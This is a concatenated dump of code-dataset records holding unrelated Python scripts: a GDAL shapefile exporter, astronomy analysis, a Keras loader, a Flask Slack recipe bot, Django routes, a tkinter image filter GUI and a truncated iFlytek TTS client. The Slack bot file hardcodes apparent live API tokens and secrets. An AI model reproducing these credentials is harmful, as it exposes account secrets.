ogr.OFTString),\n ('qaqc', 254, ogr.OFTString),\n ('p_crd_a', 10, ogr.OFTReal),\n ('p_s_crd_a', 254, ogr.OFTString)]\n\n # Add extra fields\n if classification is not None:\n fields_definitions.append(('class', 254, ogr.OFTString))\n\n # Create fields\n for field in fields_definitions:\n field_name = field[0]\n field_width = field[1]\n field_type = field[2]\n print(\" \" + field_name)\n field_object = ogr.FieldDefn(str(field_name), field_type)\n field_object.SetWidth(field_width)\n layer.CreateField(field_object)\n\n #/* ======================================================================= */#\n #/* Analyze task.json Content\n #/* ======================================================================= */#\n\n # Loop through all task.json tasks\n len_tasks_json = len(tasks_json)\n i = 0\n print(\"Analyzing tasks ...\")\n for task in tasks_json:\n\n # Update user\n i += 1\n sys.stdout.write(\"\\r\\x1b[K\" + \" %s/%s\" % (i, len_tasks_json))\n sys.stdout.flush()\n\n # Cache some information\n input_task_id = task['id']\n task_location = '%s,%s,%s' % (task['info']['latitude'], task['info']['longitude'], task['info']['year'])\n\n # Get initial set of attributes from task body\n # First value in the tuple goes into task_attributes, and second references the info block within the task\n # The third value in the tuple is the type object to be used\n task_attributes = {'location': task_location}\n initial_task_grab = [('id', 'id', int),\n ('latitude', 'latitude', unicode),\n ('longitude', 'longitude', unicode),\n ('wms_url', 'url', unicode),\n ('county', 'county', unicode),\n ('state', 'state', unicode),\n ('site_id', 'siteID', unicode),\n ('year', 'year', unicode)]\n\n for attributes in initial_task_grab:\n attribute_name = attributes[0]\n info_reference = attributes[1]\n type_caster = attributes[2]\n try:\n task_attributes[attribute_name] = type_caster(task['info'][info_reference])\n except (TypeError, KeyError):\n task_attributes[attribute_name] = None\n\n # Task identification\n task_attributes['id'] = int(task['id'])\n\n # Get the WMS version\n task_attributes['wms_v'] = unicode(task['info']['options']['version'])\n task_attributes['wms_id'] = unicode(task['info']['options']['layers'])\n\n # Get the crowd selection counts\n crowd_selection_counts = get_crowd_selection_counts(input_task_id, task_runs_json)\n task_attributes = dict(task_attributes.items() + crowd_selection_counts.items())\n\n # Figure out what the crowd actually selected and the total number of responses\n n_tot_res = int(sum(crowd_selection_counts.values()))\n task_attributes['n_tot_res'] = n_tot_res\n crowd_selection = get_crowd_selection(crowd_selection_counts, map_field_to_selection)\n task_attributes['crowd_sel'] = crowd_selection\n\n # Get crowd agreement levels\n task_attributes = dict(task_attributes.items()\n + get_percent_crowd_agreement(task_attributes['crowd_sel'], crowd_selection_counts,\n n_tot_res, map_selection_to_field).items())\n\n # Create the feature\n feature = ogr.Feature(layer.GetLayerDefn())\n field_values = [('id', task_attributes['id']),\n ('site_id', task_attributes['site_id']),\n ('wms_url', task_attributes['wms_url']),\n ('wms_id', task_attributes['wms_id']),\n ('wms_v', task_attributes['wms_v']),\n ('county', task_attributes['county']),\n ('state', task_attributes['state']),\n ('year', task_attributes['year']),\n ('location', task_attributes['location']),\n ('n_unk_res', task_attributes['n_unk_res']),\n ('n_nop_res', task_attributes['n_nop_res']),\n ('n_pad_res', task_attributes['n_pad_res']),\n ('n_tot_res', task_attributes['n_tot_res']),\n ('crowd_sel', task_attributes['crowd_sel']),\n ('p_crd_a', task_attributes['p_crd_a']),\n ('p_s_crd_a', task_attributes['p_s_crd_a'])]\n\n # Set values for additional fields\n if classification is not None:\n if classification[0] == '%':\n field_values.append(('class', unicode([classification[1:]])))\n else:\n field_values.append(('class', unicode(classification)))\n\n # Populate fields\n for field, value in field_values:\n feature.SetField2(str(field), value)\n wkt = \"POINT(%f %f)\" % (float(task_attributes['longitude']), float(task_attributes['latitude']))\n point = ogr.CreateGeometryFromWkt(wkt)\n feature.SetGeometry(point)\n layer.CreateFeature(feature)\n\n # Cleanup feature\n feature = None\n\n #/* ======================================================================= */#\n #/* Cleanup\n #/* ======================================================================= */#\n\n # Destroy OGR objects\n data_source = None\n layer = None\n\n # Success\n print(\" - Done.\")\n return 0\n\n\n#/* ======================================================================= */#\n#/* Commandline Execution\n#/* ======================================================================= */#\n\nif __name__ == '__main__':\n\n # Not enough arguments - print usage\n if len(sys.argv) is 1:\n sys.exit(print_usage())\n\n # Got enough arguments - give all but the first to the main() function\n else:\n sys.exit(main(sys.argv[1:]))\n","sub_path":"Data/FrackFinder/OH/2014/Tadpole/bin/task2shp.py","file_name":"task2shp.py","file_ext":"py","file_size_in_byte":25566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414073780","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 24 15:10:37 2019\n\n@author: ppxee\n\"\"\"\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy import units as u\nplt.close('all') #close any open plots\n\n#%% Check position on chi-flux plot first ###\n\n### Open the fits files and get data ###\ntbdata = fits.open('mag_flux_tables/mag_flux_table_best_extra_clean_no06.fits')[1].data\nchandata = fits.open('mag_flux_tables/xray_mag_flux_table_best_extra_clean_no06.fits')[1].data\nsdata = fits.open('mag_flux_tables/stars_mag_flux_table_extra_clean_no06.fits')[1].data\nsigtb = Table.read('sigma_tables/quad_epoch_sigma_table_extra_clean_no06_2arcsec.fits')\n\ndef prep_data(tbdata):\n ### Remove edges ###\n tbdata = vari_funcs.remove_edges(tbdata)\n \n ## Create arrays of flux values ###\n flux = vari_funcs.flux4_stacks(tbdata)\n \n ### remove values that are negative ###\n flux, tbdata = vari_funcs.noneg(flux, tbdata)\n \n ### Get error arrays ###\n flux, fluxerr, tbdata = vari_funcs.create_quad_error_array(sigtb, tbdata, aper=4)\n \n return flux, fluxerr, tbdata\n\n### Prep data ###\nflux, fluxerr, tbdata = prep_data(tbdata)\nfluxchan, chanerr, chandata = prep_data(chandata)\nsflux, serr, sdata = prep_data(sdata)\n\n\n### reset X-ray column as messed up by stacking ###\ntbdata['X-ray'][tbdata['X-ray']==70] = False \ntbdata['X-ray'][tbdata['X-ray']==84] = True\n\n### Check chisq plot looks correct ###\nfig,_ = vari_funcs.flux_variability_plot(flux, fluxchan, 'chisq', \n fluxerr=fluxerr, chanerr=chanerr,\n starflux=sflux, starfluxerr=serr,\n #normalised=True, \n stars=True, scale='log')\nfig.canvas.mpl_connect('pick_event', vari_funcs.onpickflux_2arcsec)\n\n#varydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe.fits')[1].data\n#varydatalow = vari_funcs.flux_split(varydata, 'lower')\nvarydatalow = fits.open('variable_tables/no06_variables_chi30_2arcsec_spec_DR11.fits')[1].data\n#varydatalow = vari_funcs.flux_split(varydata, 'lower')\n\nvaryfluxlow, varyfluxerrlow, varydatalow = prep_data(varydatalow)\nvarymeanlow = np.nanmean(varyfluxlow, axis=1)\nvarychilow = vari_funcs.my_chisquare_err(varyfluxlow, varyfluxerrlow)\nplt.plot(varymeanlow, varychilow, 'kd', mfc='None')\n\n","sub_path":"lower_properties.py","file_name":"lower_properties.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68231299","text":"import pandas as pd\nimport os\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.DataFrame({'text':['a..b?!??', '%hgh&12','abc123!!!', '$$$1234']})\n# print(df)\ndf['text'] = df['text'].str.replace(r'[^\\w\\s]+', '')\n# print(df)\n\n\n\nx=6.666\nx=str(x)\nx=x[:4]\n\nx=float(x)\nprint(type(x))\n","sub_path":"Anuja/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159400823","text":"from concurrent.futures import ThreadPoolExecutor\nfrom glob import glob\n\nimport numpy as np\nimport scipy.misc\nfrom keras.datasets import mnist\n\n\nclass DataLoader:\n\n def __init__(self, dataset_path=\".\", dataset_name='mnist', img_res=(64, 64)):\n self.dataset_name = dataset_name\n self.dataset_path = dataset_path\n self.img_res = img_res\n if self.dataset_name == 'mnist':\n self.dataset = mnist.load_data()\n else:\n self.dataset = None\n\n def imread(self, path):\n return scipy.misc.imread(path, mode='RGB').astype(np.float)\n\n def make_image_thumbnail(self, img_path, is_testing=False):\n img = self.imread(img_path)\n img = scipy.misc.imresize(img, self.img_res)\n\n # If training => do random flip\n if not is_testing and np.random.random() < 0.5:\n img = np.fliplr(img)\n\n return img\n\n def load_data(self, batch_size=1, is_testing=False):\n if self.dataset_name == 'mnist':\n (X_train, X_test), (_, _) = self.dataset\n X = X_test if is_testing else X_train\n\n idxs = np.random.randint(0, X.shape[0], size=batch_size)\n imgs = X[idxs]\n\n return_imgs = []\n\n with ThreadPoolExecutor() as executor:\n for img in executor.map(lambda img: scipy.misc.imresize(img, self.img_res), imgs):\n return_imgs.append(img)\n return np.expand_dims(np.array(return_imgs), axis=3) / 127.5 - 1\n elif self.dataset_name == 'img_align_celeba':\n path = glob(self.dataset_path + '/%s/*' % (self.dataset_name))\n\n batch_images = np.random.choice(path, size=batch_size)\n\n return_imgs = []\n with ThreadPoolExecutor() as executor:\n for thumbnail in executor.map(self.make_image_thumbnail, batch_images):\n return_imgs.append(thumbnail)\n\n return np.array(return_imgs) / 127.5 - 1.\n\n return None\n","sub_path":"sagan/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368067762","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport time\nimport urllib.request\n\nfrom recipeSearchKeyword import *\nfrom best_menu import *\nfrom hi import *\nfrom dongheedong import *\nfrom searching import *\nfrom main_keyword import *\nfrom category import *\n\n\nfrom bs4 import BeautifulSoup\nfrom slackclient import SlackClient\nfrom selenium import webdriver\nfrom flask import Flask, request, make_response, render_template\n\n\napp = Flask(__name__)\n\nslack_token = \"xoxb-502761537154-508511707139-8qs5cBjfZqaT87QwRLtIHvV9\"\nslack_client_id = \"502761537154.510016672070\"\nslack_client_secret = \"cd625f3ca20cd0d50cf83c2566587a10\"\nslack_verification = \"Ms4sLMxUfi20iTN3liuT5Tyn\"\nsc = SlackClient(slack_token)\n\ndriver = webdriver.Chrome(r'C:\\Users\\student\\Desktop\\chromedriver.exe')\n# http://cc01b936.ngrok.io/listening\n\n# 사용자 호출 전에 실행되어야 할 것\n# new_ = []\n# 크롤링 함수 구현하기\ntime1 = \"\"\n\ndef _crawl_naver_keywords(text):\n text2 = re.sub('<@\\S+> ','', text)\n FindUrl = \"http://www.10000recipe.com\"\n a = \"http://www.10000recipe.com/recipe/list.html?q=&cat1=&cat2=&cat3=\"\n b = \"&cat4=&order=accuracy&dsearch=©shot=&scrap=°ree=&portion=&time=&niresource=\"\n # new_ = []\n new = [] # 결과 출력 리스트\n line = 1 # 순위, 순번을 나타내는 line\n links = [] #하이퍼링크 추출 후 저장 리스트\n indgre_key = main_keyword(text)\n\n print(indgre_key)\n if int(indgre_key) > 1:\n if indgre_key:\n url = a + str(indgre_key) + b\n source = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(source, \"html.parser\")\n\n #하이퍼링크를 찾아오는 것\n for y in soup.find_all(\"div\", class_=\"col-xs-4\"):\n links.append(FindUrl + y.find(\"a\")[\"href\"])\n for x in soup.find_all(\"h4\", class_=\"ellipsis_title2\"):\n #하이퍼링크 달아주는 부분 + 순서\n new.append(\"<\" + links[line-1] + \"|\" + str(line) + \"번 \" + x.get_text().strip().replace(\"\\n\", ' ').replace(\"★\", \"\")+\">\\n\")\n line += 1\n\n print(links)\n #제목 다는 부분\n return text2 + \"★메뉴 추천★ \\n\" + u'\\n'.join(new)\n return _crawl_naver_keywords(text)\n else:\n if \"인기블로거\" in text2:\n return best_menu(text2)\n elif \"냉부\" in text2:\n return hi(text2)\n\n # 쿡봇쓰기 전 쿡봇 깨우기\n elif \"안녕\" in text2:\n answer = \"1.재료별 카테고리를 입력하세요\\n\\n : 소고기, 돼지고기, 닭고기, 육류,\\n\\n 채소류, 해물류,달걀, 유제품,\\n\\n 가공식품류, 쌀, 밀가루, 건어물류, 버섯류,\\n\\n 과일류, 콩, 견과류, 곡류, 기타 \\n\\n\\n\\n2. 원하는거 아무거나 입력하세요 \\n\\n\\n\\n3. '오늘', '오늘 순위'를 검색하면 오늘의 인기 요리!\\n\\n\\n\\n4. '냉장고를 부탁해' 쉐프들의 요리가 궁금하다면!? : '냉부'검색!\\n\\n\\n\\n5. 인기요리블로거가 궁금하다면 '인기블로거'검색까지!\\n\\n\\n\"\n\n return answer\n elif \"추천\" in text2:\n answer = \"1.재료별 카테고리를 입력하세요\\n\\n : 소고기, 돼지고기, 닭고기, 육류,\\n\\n 채소류, 해물류,달걀, 유제품,\\n\\n 가공식품류, 쌀, 밀가루, 건어물류, 버섯류,\\n\\n 과일류, 콩, 견과류, 곡류, 기타 \\n\\n\\n\\n2. 원하는거 아무거나 입력하세요 \\n\\n\\n\\n3. '오늘', '오늘 순위'를 검색하면 오늘의 인기 요리!\\n\\n\\n\\n4. '냉장고를 부탁해' 쉐프들의 요리가 궁금하다면!? : '냉부'검색!\\n\\n\\n\\n5. 인기요리블로거가 궁금하다면 '인기블로거'검색까지!\\n\\n\\n\"\n\n\n return answer\n\n # 오늘의 순위와 오늘의 메뉴 들\n elif \"오늘\" in text2:\n return crawl_detail_recipe1(text2, driver)\n elif \"오늘 순위\" in text2:\n return crawl_detail_recipe1(text2, driver)\n\n # 재료 또는 메뉴를 검색해서 selenium\n else:\n return crawl_detail_recipe(text2, driver)\n\n# 이벤트 핸들하는 함수\ndef _event_handler(event_type, slack_event):\n print(slack_event[\"event\"])\n\n if event_type == \"app_mention\":\n # msg = {}\n channel = slack_event[\"event\"][\"channel\"]\n text = slack_event[\"event\"][\"text\"]\n keywords = _crawl_naver_keywords(text)\n # msg['text'] = text\n # msg[\"image_url\"] = \"http://recipe1.ezmember.co.kr/img/thumb_over.png\"\n\n # menus = choice_menu(text)\n # if \"오늘\"in text:\n # sc.api_call(\n # \"chat.postMessage\",\n # channel=channel,\n # text=keywords,\n # attachments = json.dumps([msg])\n # )\n # else:\n sc.api_call(\n \"chat.postMessage\",\n channel=channel,\n text=keywords\n # if \"오늘\" in text:\n # attachments = json.dumps([msg])\n )\n\n\n return make_response(\"App mention message has been sent\", 200, )\n\n # ============= Event Type Not Found! ============= #\n # If the event_type does not have a handler\n message = \"You have not added an event handler for the %s\" % event_type\n # Return a helpful error message\n return make_response(message, 200, {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/listening\", methods=[\"GET\", \"POST\"])\ndef hears():\n global time1\n slack_event = json.loads(request.data)\n\n if \"challenge\" in slack_event:\n return make_response(slack_event[\"challenge\"], 200, {\"content_type\":\n \"application/json\"\n })\n\n if slack_verification != slack_event.get(\"token\"):\n message = \"Invalid Slack verification token: %s\" % (slack_event[\"token\"])\n make_response(message, 403, {\"X-Slack-No-Retry\": 1})\n global time1\n if \"event\" in slack_event:\n event_type = slack_event[\"event\"][\"type\"]\n if slack_event[\"event\"][\"event_ts\"] != time1:\n time1 = slack_event[\"event\"][\"event_ts\"]\n return _event_handler(event_type, slack_event)\n else:\n return make_response(\"duple\", 200,)\n\n # If our bot hears things that are not events we've subscribed to,\n # send a quirky but helpful error response\n return make_response(\"[NO EVENT IN SLACK REQUEST] These are not the droids\\\n you're looking for.\", 404, {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return \"

Server is readysssssss

\"\n\n\nif __name__ == '__main__':\n app.run('127.0.0.1', port=5222)\n","sub_path":"onedayonefood/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362150254","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom blog.views import DuplicationCheck\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^post/', include('blog.urls')),\n #중략\n url(r'^signup/$','blog.views.signup', name='signup'),\n url(r'^signup_ok/$',TemplateView.as_view(template_name='registration/signup_ok.html'), name='signup_ok'),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', name='login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/accounts/login/',}, name='logout_url'),\n url(r'^duplcheck$', DuplicationCheck.as_view(), name='duplcheck'),\n url(r'^photo/', include('photo.urls')),\n\n #summernote\n url(r'^summernote/', include('django_summernote.urls')),\n]\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573309394","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020-05-25\n# @Author : Joey Jiang\n# @File : test_base11_3_1.py\n# @Software : PyCharm\n# @Description: 文件上传弹框处理\n'''\n文件上传\n\ninput标签:\n ele=driver.find_element(By.ID,\"上传按钮id\")\n ele.send_keys(\"文件路径+文件名\")\n\n问题是click()方法写错了,但是系统没有报错\n'''\nfrom time import sleep\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestFileUpload:\n def setup(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(3)\n def teardown(self):\n self.driver.quit()\n def test_file_upload(self):\n self.driver.get(\"https://image.baidu.com\")\n sleep(2)\n self.driver.find_element(By.XPATH,'//*[@id=\"sttb\"]/img[1]').clik()\n self.driver.find_element(By.ID,\"stfile\").send_keys(\"G:/python/1.png\")\n sleep(3)\n # 有问题","sub_path":"python_base/base11/base11_3/test_base11_3_1.py","file_name":"test_base11_3_1.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261543476","text":"import sys\n\ndef main(filename):\n file=open(filename)\n for line in file:\n list=[]\n list1=[]\n list2=[]\n for word in line.split():\n list.append(word)\n if word not in list1:\n list1.append(word)\n list2.append(word)\n elif word in list1:\n try:\n list2.remove(word)\n except ValueError:\n pass\n try:\n print(list.index(min(list2))+1)\n except ValueError:\n print(0)\nmain(sys.argv[1])\n","sub_path":"Python/complete/lowestuniquenumber.py3","file_name":"lowestuniquenumber.py3","file_ext":"py3","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"41186594","text":"import tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter import Button\n\nfrom Filter import *\nfrom ImageContainer import *\n\nclass MainWindow(tk.Frame):\n def __init__(self, root):\n super().__init__(root)\n\n # self.namelabel = tk.Label(text=\"Image Processor\")\n # self.namelabel.grid(row=0, column=0, columnspan=1)\n\n self.imgForProcessing = None\n self.img_id = None\n self.processor = None\n\n self._canvasSize = (900, 720)\n self._histo_canvas_size = (256, 256)\n\n self.canvas = None\n self.photoImg = None\n\n self.loadBtn = None\n\n self.histo_canvas = None\n\n self.grayscaleBtn = None\n\n self.negBtn = None\n self.neg_scale = None\n\n self.solBtn = None\n self.sol_spin = None\n\n self.contrastIncBtn = None\n self.contrast_inc_spin_from = None\n self.contrast_inc_spin_to = None\n\n self.contrastDecBtn = None\n self.contrast_dec_spin_from = None\n self.contrast_dec_spin_to = None\n\n self.smoothBtn = None\n\n self.kirsch_op_button = None\n\n self.adaptive_binarization_btn = None\n self.adaptive_bin_spin_radius = None\n\n self.rotation_button = None\n self.choose_angle_spin = None\n self.choose_axis_x_spin = None\n self.choose_axis_y_spin = None\n\n self.resampling_button = None\n self.choose_scale_spin = None\n\n self.rect = None\n self.started_rect_coords = []\n\n self.selected_area = []\n\n self.search_line_button = None\n self.pre_work_button = None\n\n self.search_circle_button = None\n\n self.initLoad()\n\n def initLoad(self):\n self.loadBtn = Button(text=\"Нажми\",\n relief=\"flat\",\n font=\"Times 12\",\n height=50,\n width=200,\n command=self.loadBtnClicked)\n\n self.loadBtn.grid(row=15, column=14)\n\n def initMain(self):\n self.loadBtn.grid_remove()\n\n self.canvas = tk.Canvas(background=\"#008B8B\", width=self._canvasSize[0], height=self._canvasSize[1])\n self.canvas.grid(row=0, column=5, rowspan=30)\n\n self.grayscaleBtn = Button(text=\"В оттенках серого\",\n font=\"Times 12 bold\",\n bg = \"#48D1CC\",\n relief=\"flat\",\n width=30,\n command=self.grayscaleBtnClicked)\n\n self.grayscaleBtn.grid(row=13, column=0, columnspan=4)\n\n self.resampling_button = Button(text=\"Масштабирование\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg = \"#48D1CC\",\n width=20,\n command=self.resampling_button_clicked)\n self.resampling_button.grid(row=14, column=0, columnspan=2)\n self.choose_scale_spin = tk.Spinbox()\n self.choose_scale_spin.grid(row=14, column=2, columnspan=2)\n\n self.kirsch_op_button = Button(text=\"Кирша\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=30,\n command=self.kirsch_operator_btn_clicked)\n self.kirsch_op_button.grid(row=15, column=0, columnspan=4)\n\n self.adaptive_binarization_btn = Button(text=\"Бинаризация\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.adaptive_binarization_btn_clicked)\n self.adaptive_binarization_btn.grid(row=16, column=0, columnspan=2)\n self.adaptive_bin_spin_radius = tk.Spinbox(from_=3, to=15)\n self.adaptive_bin_spin_radius.grid(row=16, column=2, columnspan=2)\n\n self.rotation_button = Button(text=\"Поворот\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.rotation_button_clicked)\n\n self.rotation_button.grid(row=17, column=0, columnspan=2)\n self.choose_angle_spin = tk.Spinbox(from_=0, to=360)\n self.choose_angle_spin.grid(row=17, column=2, columnspan=2)\n self.choose_axis_x_spin = tk.Spinbox()\n self.choose_axis_x_spin.grid(row=18, column=1)\n self.choose_axis_y_spin = tk.Spinbox()\n self.choose_axis_y_spin.grid(row=18, column=3)\n\n self.search_line_button = Button(text=\"LINE\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.search_line_button_clicked)\n\n self.search_line_button.grid(row=19, column=0, columnspan=2)\n\n self.pre_work_button = Button(text=\"preWork\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.pre_work_button_clicked)\n\n self.pre_work_button.grid(row=20, column=0, columnspan=2)\n\n self.search_circle_button = Button(text=\"Circle\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.search_circle_button_clicked)\n\n self.search_circle_button.grid(row=21, column=0, columnspan=2)\n\n self.canvas.bind(\"\", self.mouse_clicked_handler)\n self.canvas.bind(\"\", self.mouse_down_handler)\n\n self._drawImage()\n\n def loadImg(self):\n file_name = fd.askopenfilename(title=\"Выбрать изображение\",\n filetypes=((\"jpeg files\", \"*.jpg\"),\n (\"jpeg files\", \"*.jpeg\"),\n (\"png files\", \"*.png\"),\n (\"GIF files\", \"*.gif\"),\n (\"bmp files\", \"*.bmp\")))\n\n self.imgForProcessing = ImageContainer(file_name)\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.get_img())\n\n self.initMain()\n\n def loadBtnClicked(self):\n self.loadImg()\n\n def _drawImage(self):\n self.canvas.delete(\"all\")\n\n size = self.imgForProcessing.getSize()\n if size[0] > self._canvasSize[0] or size[1] > self._canvasSize[1]:\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.imgScale(self._canvasSize))\n\n self.img_id = self.canvas.create_image(self._canvasSize[0] / 2, self._canvasSize[1] / 2,\n image=self.photoImg)\n\n def _apply_filter(self, filter, **kwargs):\n self.imgForProcessing.applyFilter(filter, **kwargs)\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.get_img())\n\n self._drawImage()\n\n def grayscaleBtnClicked(self):\n self._apply_filter(Filter.grayscale)\n\n def neg_btn_clicked(self):\n threshold_value = self.neg_scale.get()\n self._apply_filter(Filter.negative, threshold=threshold_value)\n\n def sol_btn_clicked(self):\n k_value = float(self.sol_spin.get())\n self._apply_filter(Filter.solarisation, k=k_value)\n\n def contrast_increase_btn_clicked(self):\n min_val = int(self.contrast_inc_spin_from.get())\n max_val = int(self.contrast_inc_spin_to.get())\n\n self._apply_filter(Filter.inc_contrast, min=min_val, max=max_val)\n\n def contrast_decrease_btn_clicked(self):\n min_val = int(self.contrast_inc_spin_from.get())\n max_val = int(self.contrast_inc_spin_to.get())\n\n self._apply_filter(Filter.dec_contrast, min=min_val, max=max_val)\n\n def kirsch_operator_btn_clicked(self):\n self._apply_filter(Filter.kirsch_operator)\n\n def adaptive_binarization_btn_clicked(self):\n radius = int(self.adaptive_bin_spin_radius.get())\n\n self._apply_filter(Filter.adaptive_binarization, radius=radius)\n\n def mouse_down_handler(self, event):\n self.canvas.delete(self.rect)\n self.selected_area = [self.started_rect_coords[0], self.started_rect_coords[1], event.x, event.y]\n self.rect = self.canvas.create_rectangle(self.selected_area)\n\n def mouse_clicked_handler(self, event):\n self.canvas.delete(self.rect)\n self.started_rect_coords = [event.x, event.y]\n\n def rotation_button_clicked(self):\n angle_val = int(self.choose_angle_spin.get()) * math.pi / 180\n axis_x_val = self.choose_axis_x_spin.get()\n axis_y_val = self.choose_axis_y_spin.get()\n\n self.fix_region_coords()\n self._apply_filter(Filter.rotation, angle=angle_val, area=self.selected_area, c_x=axis_x_val, c_y=axis_y_val)\n\n def search_line_button_clicked(self):\n self._apply_filter(Filter.searchLine)\n\n def search_circle_button_clicked(self):\n self._apply_filter(Filter.searchCircle)\n\n def pre_work_button_clicked(self):\n self._apply_filter(Filter.pre_work)\n\n def resampling_button_clicked(self):\n scale_val = float(self.choose_scale_spin.get())\n\n self.fix_region_coords()\n self._apply_filter(Filter.biquadratic_resampling, area=self.selected_area, scale=scale_val)\n\n def fix_region_coords(self):\n img_size = self.imgForProcessing.getSize()\n img_left_corner_coords = [self.canvas.coords(self.img_id)[0] - img_size[0] // 2,\n self.canvas.coords(self.img_id)[1] - img_size[1] // 2]\n\n self.selected_area[0] -= img_left_corner_coords[0]\n self.selected_area[1] -= img_left_corner_coords[1]\n self.selected_area[2] -= img_left_corner_coords[0]\n self.selected_area[3] -= img_left_corner_coords[1]\n","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"236152513","text":"# -*- coding:utf-8 -*-\n#\n# author: iflytek\n#\n# 本demo测���时运行的环境为:Windows + Python3.7\n# 本demo测试成功运行时所安装的第三方库及其版本如下:\n# cffi==1.12.3\n# gevent==1.4.0\n# greenlet==0.4.15\n# pycparser==2.19\n# six==1.12.0\n# websocket==0.2.1\n# websocket-client==0.56.0\n#\n# 错误码链接:https://www.xfyun.cn/document/error-code (code返回错误码时必看)\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\nimport websocket\nimport datetime\nimport hashlib\nimport base64\nimport hmac\nimport json\nfrom urllib.parse import urlencode\nimport time\nimport ssl\nfrom wsgiref.handlers import format_date_time\nfrom datetime import datetime\nfrom time import mktime\nimport _thread as thread\nimport os\nimport traceback\nfrom tqdm import tqdm\nimport wave\nfrom .audio_convert import pcm2wav\nfrom utils.crypt import decrypt_express\nfrom constants.common import CommonConstants\n\n\nSTATUS_FIRST_FRAME = 0 # 第一帧的标识\nSTATUS_CONTINUE_FRAME = 1 # 中间帧标识\nSTATUS_LAST_FRAME = 2 # 最后一帧的标识\n\n\nclass Ws_Param(object):\n # 初始化\n def __init__(self, APPID, APIKey, APISecret, Text):\n self.APPID = APPID\n self.APIKey = APIKey\n self.APISecret = APISecret\n self.Text = Text\n\n # 公共参数(common)\n self.CommonArgs = {\"app_id\": self.APPID}\n # 业务参数(business),更多个性化参数可在官网查看\n self.BusinessArgs = {\"aue\": \"raw\", \"auf\": \"audio/L16;rate=16000\", \"vcn\": \"xiaoyan\", \"tte\": \"utf8\"}\n # print(self.Text)\n self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-8')), \"UTF8\")}\n\n # 生成url\n def create_url(self):\n url = 'wss://tts-api.xfyun.cn/v2/tts'\n # 生成RFC1123格式的时间戳\n now = datetime.now()\n date = format_date_time(mktime(now.timetuple()))\n\n # 拼接字符串\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\n signature_origin += \"date: \" + date + \"\\n\"\n signature_origin += \"GET \" + \"/v2/tts \" + \"HTTP/1.1\"\n # 进行hmac-sha256进行加密\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\n digestmod=hashlib.sha256).digest()\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\n\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\n authorization = 